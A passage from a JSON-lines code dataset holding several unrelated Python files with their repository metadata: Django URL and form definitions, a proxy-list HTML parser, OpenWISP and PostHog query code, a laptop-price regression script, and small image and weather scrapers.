"PySide2.QtWidgets", "line_number": 174, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QHBoxLayout", "line_number": 183, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets", "line_number": 183, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QVBoxLayout", "line_number": 192, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets", "line_number": 192, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QWidget", "line_number": 197, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets", "line_number": 197, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QHBoxLayout", "line_number": 200, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets", "line_number": 200, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QWidget", "line_number": 206, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets", "line_number": 206, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QHBoxLayout", "line_number": 209, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets", "line_number": 209, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QSpacerItem", "line_number": 213, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets", "line_number": 213, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QSpacerItem", "line_number": 217, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets", "line_number": 217, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QWidget", "line_number": 220, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets", "line_number": 220, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QVBoxLayout", "line_number": 223, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets", "line_number": 223, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QWidget", "line_number": 229, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets", "line_number": 229, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QApplication", "line_number": 235, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets", "line_number": 235, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 235, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 240, "usage_type": "call"}]} +{"seq_id": "18811246700", "text": "from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.front, name='blogs-frontship'),\n path('Home/', views.home, name='blogs-home'),\n # path('frontship/', views.front, name='blogs-frontship'),\n path('register/', views.add, name='blogs-register'),\n path('submit/', views.add, name='blogs-register'),\n path('dashboard/', views.dashboard, name='blogs-dashboard'),\n]\n\n\n'''\n[{% for dess in des %} '{{ dess.orgin }}', {% endfor %}]\n'''", "repo_name": "ahamed2408/SupplyChains", "sub_path": "f_projects/blogs/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 474, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.urls.path", "line_number": 5, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 6, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}]} +{"seq_id": "12296230789", "text": "# coding=utf8\n\nimport re\nimport base64\n\nfrom lxml import etree\n\nfrom config import config\nfrom Logger.Logger import logging\n\nclass HtmlParser(object):\n\n def __init__(self):\n self.ips = []\n\n def parse(self, response, parser):\n return self.XpathPraser(response, parser)\n\n def XpathPraser(self, response, parser):\n iplist = []\n root = etree.HTML(response)\n proxys = root.xpath(parser['pattern'])\n for proxy in proxys:\n try:\n ip = proxy.xpath(parser['position']['ip'])[0].text.replace(' ', '')\n port = proxy.xpath(parser['position']['port'])[0].text.replace(' ', '')\n location = proxy.xpath(parser['position']['location'])[0].text.replace(' ', '')\n iptype = proxy.xpath(parser['position']['type'])[0].text.replace(' ', '')\n if parser['position']['protocol']:\n protocol = proxy.xpath(parser['position']['protocol'])[0].text.replace(' ', '')\n else:\n protocol = ''\n\n logging.info(\"{0}:{1}\\t{2}\\t{3}\\t{4}\".format(ip, port, location, iptype, protocol))\n # print \"###\", ip, ':', port, location, iptype, \"###\"\n proxy = {\n \"ip\": ip,\n \"port\": port,\n \"location\": location,\n \"iptype\": iptype,\n \"protocol\": protocol,\n }\n except Exception as e:\n logging.info(\"Exception: {0}\".format(e))\n # print e\n continue\n iplist.append(proxy)\n return iplist\n\n\nhtml_parser = HtmlParser()\n", "repo_name": "pigjj/IPProxyPool", "sub_path": "IPProxySpider/proxy/IPSpider/HtmlParser.py", "file_name": "HtmlParser.py", "file_ext": "py", "file_size_in_byte": 1676, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "52", "api": [{"api_name": "lxml.etree.HTML", "line_number": 21, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 21, "usage_type": "name"}, {"api_name": "Logger.Logger.logging.info", "line_number": 34, "usage_type": "call"}, {"api_name": "Logger.Logger.logging", "line_number": 34, "usage_type": "name"}, {"api_name": "Logger.Logger.logging.info", "line_number": 44, "usage_type": "call"}, {"api_name": "Logger.Logger.logging", "line_number": 44, "usage_type": "name"}]} +{"seq_id": "29209885545", "text": "from collections import OrderedDict\n\nfrom django.contrib.contenttypes.fields import GenericForeignKey\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.db import models\nfrom django.utils.functional import cached_property\nfrom django.utils.module_loading import import_string\nfrom django.utils.translation import gettext_lazy as _\nfrom jsonfield import JSONField\n\nfrom openwisp_monitoring.check import settings as app_settings\nfrom openwisp_monitoring.check.tasks import (\n auto_create_config_check,\n auto_create_iperf3_check,\n auto_create_ping,\n)\nfrom openwisp_utils.base import TimeStampedEditableModel\n\nfrom ...utils import transaction_on_commit\n\n\nclass AbstractCheck(TimeStampedEditableModel):\n name = models.CharField(max_length=64, db_index=True)\n is_active = models.BooleanField(\n _('active'),\n default=True,\n db_index=True,\n help_text=_(\n 'whether the check should be run, related metrics collected and alerts sent'\n ),\n )\n description = models.TextField(blank=True, help_text=_('Notes'))\n content_type = models.ForeignKey(\n ContentType, on_delete=models.CASCADE, null=True, blank=True\n )\n object_id = models.CharField(max_length=36, db_index=True, blank=True)\n content_object = GenericForeignKey('content_type', 'object_id')\n check_type = models.CharField(\n _('check type'),\n choices=app_settings.CHECK_CLASSES,\n db_index=True,\n max_length=128,\n )\n params = JSONField(\n _('parameters'),\n default=dict,\n blank=True,\n help_text=_('parameters needed to perform the check'),\n load_kwargs={'object_pairs_hook': OrderedDict},\n dump_kwargs={'indent': 4},\n )\n\n class Meta:\n abstract = True\n unique_together = ('name', 'object_id', 'content_type')\n\n permissions = (\n ('add_check_inline', 'Can add check inline'),\n ('change_check_inline', 'Can change check inline'),\n ('delete_check_inline', 'Can delete check inline'),\n ('view_check_inline', 'Can view check inline'),\n )\n\n def __str__(self):\n if not self.object_id or not self.content_type:\n return self.name\n obj = self.content_object\n model_name = obj.__class__.__name__\n return '{0} ({1}: {2})'.format(self.name, model_name, obj)\n\n def clean(self):\n self.check_instance.validate()\n\n def full_clean(self, *args, **kwargs):\n # The name of the check will be the same as the\n # 'check_type' chosen by the user when the\n # name field is empty (useful for CheckInline)\n if not self.name:\n self.name = self.get_check_type_display()\n return super().full_clean(*args, **kwargs)\n\n @cached_property\n def check_class(self):\n \"\"\"\n returns check class\n \"\"\"\n return import_string(self.check_type)\n\n @cached_property\n def check_instance(self):\n \"\"\"\n returns check class instance\n \"\"\"\n check_class = self.check_class\n return check_class(check=self, params=self.params)\n\n def perform_check(self, store=True):\n \"\"\"\n initiates check instance and calls its check method\n \"\"\"\n if (\n hasattr(self.content_object, 'organization_id')\n and self.content_object.organization.is_active is False\n ):\n return\n return self.check_instance.check(store=True)\n\n def perform_check_delayed(self, duration=0):\n from ..tasks import perform_check\n\n perform_check.apply_async(args=[self.id], countdown=duration)\n\n\ndef auto_ping_receiver(sender, instance, created, **kwargs):\n \"\"\"\n Implements OPENWISP_MONITORING_AUTO_PING\n The creation step is executed in the background\n \"\"\"\n # we need to skip this otherwise this task will be executed\n # every time the configuration is requested via checksum\n if not created:\n return\n transaction_on_commit(\n lambda: auto_create_ping.delay(\n model=sender.__name__.lower(),\n app_label=sender._meta.app_label,\n object_id=str(instance.pk),\n )\n )\n\n\ndef auto_config_check_receiver(sender, instance, created, **kwargs):\n \"\"\"\n Implements OPENWISP_MONITORING_AUTO_DEVICE_CONFIG_CHECK\n The creation step is executed in the background\n \"\"\"\n # we need to skip this otherwise this task will be executed\n # every time the configuration is requested via checksum\n if not created:\n return\n transaction_on_commit(\n lambda: auto_create_config_check.delay(\n model=sender.__name__.lower(),\n app_label=sender._meta.app_label,\n object_id=str(instance.pk),\n )\n )\n\n\ndef auto_iperf3_check_receiver(sender, instance, created, **kwargs):\n \"\"\"\n Implements OPENWISP_MONITORING_AUTO_IPERF3\n The creation step is executed in the background\n \"\"\"\n # we need to skip this otherwise this task will be executed\n # every time the configuration is requested via checksum\n if not created:\n return\n transaction_on_commit(\n lambda: auto_create_iperf3_check.delay(\n model=sender.__name__.lower(),\n app_label=sender._meta.app_label,\n object_id=str(instance.pk),\n )\n )\n", "repo_name": "openwisp/openwisp-monitoring", "sub_path": "openwisp_monitoring/check/base/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 5350, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 131, "dataset": "github-code", "pt": "52", "api": [{"api_name": "openwisp_utils.base.TimeStampedEditableModel", "line_number": 22, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 23, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 23, "usage_type": "name"}, {"api_name": "django.db.models.BooleanField", "line_number": 24, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 24, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 25, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 28, "usage_type": "call"}, {"api_name": "django.db.models.TextField", "line_number": 32, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 32, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 32, "usage_type": "call"}, {"api_name": "django.db.models.ForeignKey", "line_number": 33, "usage_type": "call"}, {"api_name": "django.contrib.contenttypes.models.ContentType", "line_number": 34, "usage_type": "argument"}, {"api_name": "django.db.models", "line_number": 33, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 34, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 34, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 36, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 36, "usage_type": "name"}, {"api_name": "django.contrib.contenttypes.fields.GenericForeignKey", "line_number": 37, "usage_type": "call"}, {"api_name": "django.db.models.CharField", "line_number": 38, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 38, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 39, "usage_type": "call"}, {"api_name": "openwisp_monitoring.check.settings.CHECK_CLASSES", "line_number": 40, "usage_type": "attribute"}, {"api_name": "openwisp_monitoring.check.settings", "line_number": 40, "usage_type": "name"}, {"api_name": "jsonfield.JSONField", "line_number": 44, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 45, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 48, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 49, "usage_type": "name"}, {"api_name": "django.utils.module_loading.import_string", "line_number": 87, "usage_type": "call"}, {"api_name": "django.utils.functional.cached_property", "line_number": 82, "usage_type": "name"}, {"api_name": "django.utils.functional.cached_property", "line_number": 89, "usage_type": "name"}, {"api_name": "tasks.perform_check.apply_async", "line_number": 111, "usage_type": "call"}, {"api_name": "tasks.perform_check", "line_number": 111, "usage_type": "name"}, {"api_name": "utils.transaction_on_commit", "line_number": 123, "usage_type": "call"}, {"api_name": "openwisp_monitoring.check.tasks.auto_create_ping.delay", "line_number": 124, "usage_type": "call"}, {"api_name": "openwisp_monitoring.check.tasks.auto_create_ping", "line_number": 124, "usage_type": "name"}, {"api_name": "utils.transaction_on_commit", "line_number": 141, "usage_type": "call"}, {"api_name": "openwisp_monitoring.check.tasks.auto_create_config_check.delay", "line_number": 142, "usage_type": "call"}, {"api_name": "openwisp_monitoring.check.tasks.auto_create_config_check", "line_number": 142, "usage_type": "name"}, {"api_name": "utils.transaction_on_commit", "line_number": 159, "usage_type": "call"}, {"api_name": "openwisp_monitoring.check.tasks.auto_create_iperf3_check.delay", "line_number": 160, "usage_type": "call"}, {"api_name": "openwisp_monitoring.check.tasks.auto_create_iperf3_check", "line_number": 160, "usage_type": "name"}]} +{"seq_id": "31620117475", "text": "\"\"\"\nCreated by Amey on 11/07/2020\n\"\"\"\n\nimport serial.tools.list_ports as lp\n\nSUPPORT_DEVICES = [\n \"Arduino\",\n]\n\ndef getArduinoDevice():\n \"\"\"\n Returns the Arduino Manufactured Device\n >>> getArduinoDevice()\n\n :return: Serial InterFace\n \"\"\"\n global SUPPORT_DEVICES\n\n for i in list(lp.comports()):\n for device in SUPPORT_DEVICES:\n if(\"Arduino\" in str(i.manufacturer)):\n return(i)\n\n return(None)\n", "repo_name": "saapo-ka-baadshah/ArduinoOscilloscope", "sub_path": "src/main_frame/SerialInterface/serial_ports.py", "file_name": "serial_ports.py", "file_ext": "py", "file_size_in_byte": 452, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "serial.tools.list_ports.comports", "line_number": 20, "usage_type": "call"}, {"api_name": "serial.tools.list_ports", "line_number": 20, "usage_type": "name"}]} +{"seq_id": "32889248631", "text": "from typing import Dict, Optional, Tuple\n\nfrom ee.clickhouse.queries.actor_base_query import ActorBaseQuery\nfrom ee.clickhouse.queries.stickiness.stickiness_event_query import StickinessEventsQuery\nfrom posthog.models.entity import Entity\nfrom posthog.models.filters.mixins.utils import cached_property\nfrom posthog.models.filters.stickiness_filter import StickinessFilter\nfrom posthog.models.team import Team\n\n\nclass ClickhouseStickinessActors(ActorBaseQuery):\n entity: Entity\n _filter: StickinessFilter\n\n def __init__(self, team: Team, entity: Entity, filter: StickinessFilter, **kwargs):\n super().__init__(team, filter, entity, **kwargs)\n\n @cached_property\n def aggregation_group_type_index(self):\n if self.entity.math == \"unique_group\":\n return self.entity.math_group_type_index\n return None\n\n def actor_query(self, limit_actors: Optional[bool] = True) -> Tuple[str, Dict]:\n events_query, event_params = StickinessEventsQuery(\n entity=self.entity, filter=self._filter, team=self._team\n ).get_query()\n\n return (\n f\"\"\"\n SELECT DISTINCT aggregation_target AS actor_id FROM ({events_query}) WHERE num_intervals = %(stickiness_day)s\n {\"LIMIT %(limit)s\" if limit_actors else \"\"}\n {\"OFFSET %(offset)s\" if limit_actors else \"\"}\n\n SETTINGS optimize_move_to_prewhere = 0\n \"\"\",\n {\n **event_params,\n \"stickiness_day\": self._filter.selected_interval,\n \"offset\": self._filter.offset,\n \"limit\": self._filter.limit,\n },\n )\n", "repo_name": "lokeshpahal/posthog1", "sub_path": "ee/clickhouse/queries/stickiness/stickiness_actors.py", "file_name": "stickiness_actors.py", "file_ext": "py", "file_size_in_byte": 1628, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "ee.clickhouse.queries.actor_base_query.ActorBaseQuery", "line_number": 11, "usage_type": "name"}, {"api_name": "posthog.models.entity.Entity", "line_number": 12, "usage_type": "name"}, {"api_name": "posthog.models.filters.stickiness_filter.StickinessFilter", "line_number": 13, "usage_type": "name"}, {"api_name": "posthog.models.team.Team", "line_number": 15, "usage_type": "name"}, {"api_name": "posthog.models.entity.Entity", "line_number": 15, "usage_type": "name"}, {"api_name": "posthog.models.filters.stickiness_filter.StickinessFilter", "line_number": 15, "usage_type": "name"}, {"api_name": "posthog.models.filters.mixins.utils.cached_property", "line_number": 18, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 24, "usage_type": "name"}, {"api_name": "ee.clickhouse.queries.stickiness.stickiness_event_query.StickinessEventsQuery", "line_number": 25, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 24, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 24, "usage_type": "name"}]} +{"seq_id": "70750103525", "text": "from django.urls import path\n\nfrom . import views\n\n\nurlpatterns = [\n path('products/', views.ProductListView.as_view()),\n path('orders/', views.OrdersListView.as_view()),\n path('create_product/', views.ProductCreateView.as_view()),\n path('hand_made_orders/', views.HandMadeOrdersListView.as_view()),\n path('users/', views.UsersListView.as_view()),\n path('images/', views.ImageListView.as_view())\n]\n", "repo_name": "L1nk0r/webMarketBackend", "sub_path": "surronshop/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 416, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 12, "usage_type": "call"}]} +{"seq_id": "15615373370", "text": "import requests \r\nfrom bs4 import BeautifulSoup as bs\r\n\r\ndef weather(city):\r\n headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'}\r\n req=requests.get(f'https://www.google.com/search?q=weather+{city}',headers=headers)\r\n data=bs(req.text , 'html.parser')\r\n\r\n time = data.select('#wob_dts')[0].getText().strip()\r\n info = data.select('#wob_dc')[0].getText().strip()\r\n weather = data.select('#wob_tm')[0].getText().strip()\r\n\r\n print(time)\r\n print(weather,'C°')\r\n print(info)\r\n\r\ncity=input('Enter your city:')\r\nweather(city)", "repo_name": "DanialHMD/Weather_Code", "sub_path": "weather.py", "file_name": "weather.py", "file_ext": "py", "file_size_in_byte": 641, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "requests.get", "line_number": 6, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 7, "usage_type": "call"}]} +{"seq_id": "16978137955", "text": "\nfrom pymongo import MongoClient\nfrom mongoengine import *\nfrom mongo_connect import Product\nimport seaborn as sns\nimport pandas as pd\nimport re\nimport matplotlib.pyplot as plt\nfrom sklearn import tree , preprocessing\nimport get_user_input\n# define a generator for reading database\n\n\n\n# def clean_mongo_data():\n# pass\n\n\n\n\ndef read_mongo(cursor):\n for doc in list(cursor):\n yield doc\n\n\nmongo_client = MongoClient('localhost', 27017)\ndb = mongo_client.laptops\ncol = db.product\ncursor = col.find()\n\ndocs = []\n# mongo_docs = list(cursor)\nwhat_not_need = ['ظرفیت حافظه داخلی' , 'محدوده سرعت پردازنده' , 'link' , 'فرکانس پردازنده' , 'مدل پردازنده' ,'مدل پردازنده گرافیکی' ,'نوع حافظه داخلی' , 'مشخصات حافظه داخلی' ,'نوع حافظه RAM']\n\n# print(mongo_docs[0])\n\n\n\nfor mongo_doc in read_mongo(cursor):\n pddoc = {}\n find_values = r'\\d+'\n for key ,value in mongo_doc.items():\n if key in what_not_need:\n continue\n elif key == 'سازنده پردازنده' :\n key = 'processor'\n elif key == 'سری پردازنده' :\n key = 'sprocessor'\n elif key == 'حافظه Cache':\n key = 'cacheM'\n value = float(re.search(find_values,value).group())\n elif key == 'ظرفیت حافظه RAM':\n key = 'RAMM'\n value = float(re.search(find_values,value).group())\n elif key == 'سازنده پردازنده گرافیکی':\n key = 'Graphic'\n elif key == 'حافظه اختصاصی پردازنده گرافیکی':\n key = 'GraphicM'\n value = re.search(find_values , value)\n if value == None :\n value = 0\n else:\n value = float(value.group())\n if value > 16 :\n value = value / 1000\n elif key =='_id' :\n key = 'brand'\n value = value.split()\n if(value == []):\n value = 'asus'\n else :\n value = value[0].lower()\n\n pddoc[key] = value\n docs.append(pddoc)\n\n\n# ****************************************************************************************\n# trying to get internal memory\n\n# for mongo_doc in mongo_docs:\n# for key , value in mongo_doc.items():\n\n# if key == 'ظرفیت حافظه داخلی':\n# print(value)\n# # print(mongo_doc['link'])\n# print(mongo_doc['مشخصات حافظه داخلی'])\n# print(mongo_doc['نوع حافظه داخلی'])\n# print('\\n\\n\\n')\n# pddoc['SSD'] = 512\n# pddoc[''] = 1000\n# continue\n# pddoc[key] = value\n# docs.append(pddoc)\n\n# print('\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n')\n# print(\"docs is \" , docs[:4])\n\n\n\n# ***************************************************************************************\n# IN first version of this , we will ignore the internal memory just to test the program\n#****************************************************************************************\n\n# print(docs)\ndata = pd.DataFrame(docs)\n\n\n# print(\"fucking data is \\n\\n\\n\" , data)\n# data.to_csv('/home/alireza/Python/jadi/project/lproj/laptops.csv')\n\n\n\noutput = data['price']\n\n# oe = preprocessing.OrdinalEncoder()\n# t_data = oe.fit_transform(data.drop(prcess_string , axis=1))\n\n\nnot_prcess_string = ['price' , 'cacheM' , 'GraphicM' , 'RAMM']\n\ndf_to_process = data.drop(not_prcess_string , axis=1)\nprcessed_df = df_to_process.apply(preprocessing.LabelEncoder().fit_transform)\n\n\nprocesse_string = ['brand' , 'processor' , 'Graphic' , 'sprocessor']\nfloat_df = data.drop(processe_string , axis=1)\nconcated_df = pd.concat([prcessed_df,float_df], axis=1, sort=False)\n# print(concated_df)\n\n\n\na = list(data['brand'])\nb = list(concated_df['brand'])\nbrand_co = dict((x, y) for x, y in zip(a, b))\n# print(\"brans are \" , brand_co)\n\na = list(data['processor'])\nb = list(concated_df['processor'])\nprocessor_co = dict((x, y) for x, y in zip(a, b))\n# print(\"processors are \" , processor_co)\n\n\na = list(data['Graphic'])\nb = list(concated_df['Graphic'])\nGraphic_co = dict((x, y) for x, y in zip(a, b))\n# print(\"graphics are \" , Graphic_co)\n\n\n\na = list(data['sprocessor'])\nb = list(concated_df['sprocessor'])\nsprocessor_co = dict((x, y) for x, y in zip(a, b))\n# print(\"seri processors are \" , sprocessor_co)\n\nclr = tree.DecisionTreeRegressor()\nclr = clr.fit(concated_df.drop(['price'] , axis=1) , output)\n\n\n\n# getting input from user\nbrand = get_user_input.get_brand()\ncacheM = get_user_input.get_cache()\nGraphic_m = get_user_input.get_GraphicM()\ngraphic = get_user_input.get_Graphic()\nprocessor = get_user_input.get_processor()\nsprocessor = get_user_input.get_sprocessor()\nram = get_user_input.get_ram()\n# print(\"graphic is \" , graphic)\n# print(Graphic_co[graphic])\npredict_this = [ brand_co[brand] , processor_co[processor] , Graphic_co[graphic],\n sprocessor_co[sprocessor], cacheM , Graphic_m ,\n ram ]\n\n# print(predict_this)\n\nans = clr.predict([predict_this])\nprint(ans[0])\n\n\n\n\n\n\n\n", "repo_name": "Al1r3z4asadi/laptop-recommend3r", "sub_path": "machine.py", "file_name": "machine.py", "file_ext": "py", "file_size_in_byte": 5173, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pymongo.MongoClient", "line_number": 26, "usage_type": "call"}, {"api_name": "re.search", "line_number": 51, "usage_type": "call"}, {"api_name": "re.search", "line_number": 54, "usage_type": "call"}, {"api_name": "re.search", "line_number": 59, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 106, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.LabelEncoder", "line_number": 123, "usage_type": "call"}, {"api_name": "sklearn.preprocessing", "line_number": 123, "usage_type": "name"}, {"api_name": "pandas.concat", "line_number": 128, "usage_type": "call"}, {"api_name": "sklearn.tree.DecisionTreeRegressor", "line_number": 156, "usage_type": "call"}, {"api_name": "sklearn.tree", "line_number": 156, "usage_type": "name"}, {"api_name": "get_user_input.get_brand", "line_number": 162, "usage_type": "call"}, {"api_name": "get_user_input.get_cache", "line_number": 163, "usage_type": "call"}, {"api_name": "get_user_input.get_GraphicM", "line_number": 164, "usage_type": "call"}, {"api_name": "get_user_input.get_Graphic", "line_number": 165, "usage_type": "call"}, {"api_name": "get_user_input.get_processor", "line_number": 166, "usage_type": "call"}, {"api_name": "get_user_input.get_sprocessor", "line_number": 167, "usage_type": "call"}, {"api_name": "get_user_input.get_ram", "line_number": 168, "usage_type": "call"}]} +{"seq_id": "1188228085", "text": "# url to image\nimport numpy as np \nimport urllib.request\nimport cv2\nfrom skimage import io\n\n\n\nclass UrlToImage():\n \"\"\"docstring for UrlToImage\"\"\"\n def __init__(self, urls):\n super(UrlToImage, self).__init__()\n self.urls = urls\n##### ***** ##### ***** ##### ***** ##### ***** \n# Method : 1 \n##### ***** ##### ***** ##### ***** ##### ***** \n def url_to_img(self):\n for url in self.urls:\n resp = urllib.request.urlopen(url)\n image = np.asarray(bytearray(resp.read()), dtype='uint8')\n image = cv2.imdecode(image, cv2.IMREAD_COLOR)\n cv2.imshow(\"Image\", image)\n cv2.waitKey(0)\n \n##### ***** ##### ***** ##### ***** ##### ***** \n# Method : 2\n##### ***** ##### ***** ##### ***** ##### ***** \n def scikit_urltoimg(self):\n for url in self.urls:\n print(\"downloading %s\" % (url))\n image = io.imread(url)\n cv2.imshow(\"Incorrect\", image)\n cv2.imshow(\"Correct\", cv2.cvtColor(image, cv2.COLOR_BGR2RGB))\n cv2.waitKey(0) \n\n\nif __name__ == '__main__':\n urls = [\"https://images.dog.ceo/breeds/mastiff-tibetan/n02108551_660.jpg\",\n \"https://images.unsplash.com/photo-1491604612772-6853927639ef?ixlib=rb-1.2.1&auto=format&fit=crop&w=500&q=60\",\n \"https://images.unsplash.com/photo-1518914781460-a3ada465edec?ixlib=rb-1.2.1&auto=format&fit=crop&w=500&q=60\"]\n obj = UrlToImage(urls)\n # obj.url_to_img()\n obj.scikit_urltoimg()\n ", "repo_name": "ankitsuwal/ai_bootcamp", "sub_path": "codes/lecture_5/url_to_image.py", "file_name": "url_to_image.py", "file_ext": "py", "file_size_in_byte": 1501, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "urllib.request.request.urlopen", "line_number": 19, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 19, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 19, "usage_type": "name"}, {"api_name": "numpy.asarray", "line_number": 20, "usage_type": "call"}, {"api_name": "cv2.imdecode", "line_number": 21, "usage_type": "call"}, {"api_name": "cv2.IMREAD_COLOR", "line_number": 21, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 22, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 23, "usage_type": "call"}, {"api_name": "skimage.io.imread", "line_number": 31, "usage_type": "call"}, {"api_name": "skimage.io", "line_number": 31, "usage_type": "name"}, {"api_name": "cv2.imshow", "line_number": 32, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 33, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 33, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 33, "usage_type": "attribute"}, {"api_name": "cv2.waitKey", "line_number": 34, "usage_type": "call"}]} +{"seq_id": "27914685431", "text": "from django import forms\n\nfrom .models import Products, Meals\n\n\nclass ProductForm(forms.ModelForm): #forms.Form\n name = forms.CharField(\n widget=forms.TextInput(\n attrs ={\n \"placeholder\":\"Pass here new product name.\",\n \"size\":25,\n \"title\":\"New product name\"\n }\n )\n )\n food_type = forms.ChoiceField(choices = (\n (\"1\", \"Meat\"),\n (\"2\", \"Fruit\"),\n (\"3\", \"Vegetable\"), \n (\"4\", \"SeaFood\"),\n (\"5\", \"Nuts\"),\n (\"6\", \"Grains\"),\n (\"7\", \"Diary\")\n )\n )\n protein = forms.FloatField(widget = forms.NumberInput(attrs= {\"placeholder\":\"Protein content.\"}))\n carbohydrates = forms.FloatField(widget = forms.NumberInput(attrs= {\"placeholder\":\"Carbohydrates content.\"}))\n fat = forms.FloatField(widget = forms.NumberInput(attrs= {\"placeholder\":\"Fat content.\"}))\n description = forms.CharField(\n min_length=20, \n widget=forms.Textarea(\n attrs={\n \"placeholder\":\"Plese enter here product desctipion.\",\n \"class\":\"new-form\",\n \"rows\":15,\n \"cols\":50\n }\n )\n )\n quantity = forms.IntegerField(widget = forms.NumberInput(attrs={\"placeholder\":\"Grams of product per portion.\", \"size\":40}))\n price = forms.DecimalField(initial=0.99) \n \n class Meta: \n model = Products \n fields = [\"name\", \"food_type\", \"protein\", \"carbohydrates\", \"fat\", \"description\", \"quantity\", \"price\"]\n\n\n\nclass MealCreationForm(forms.Form):\n name = forms.CharField(max_length = 50) \n description = forms.CharField(\n min_length=20, \n required=False,\n widget=forms.Textarea(\n attrs={\n \"placeholder\":\"Plese enter here product desctipion.\",\n \"class\":\"new-form\",\n \"rows\":8,\n \"cols\":50\n }\n )\n )\n ingredient = forms.ModelMultipleChoiceField(\n Products.objects.all(),\n widget=forms.CheckboxSelectMultiple(\n attrs={}),\n )\n\n class Meta:\n model = Meals\n fields = [\"name\", \"ingredient\", \"description\"]\n\nclass MealUpdateForm(forms.Form):\n description = forms.CharField(\n min_length=20, \n widget=forms.Textarea(\n attrs={\n \"class\":\"new-form\",\n \"rows\":15,\n \"cols\":50\n }\n )\n )\n\n class Meta: \n model = Meals\n fields = [\"description\"]\n\nclass MealQuantityUpdate(forms.Form):\n 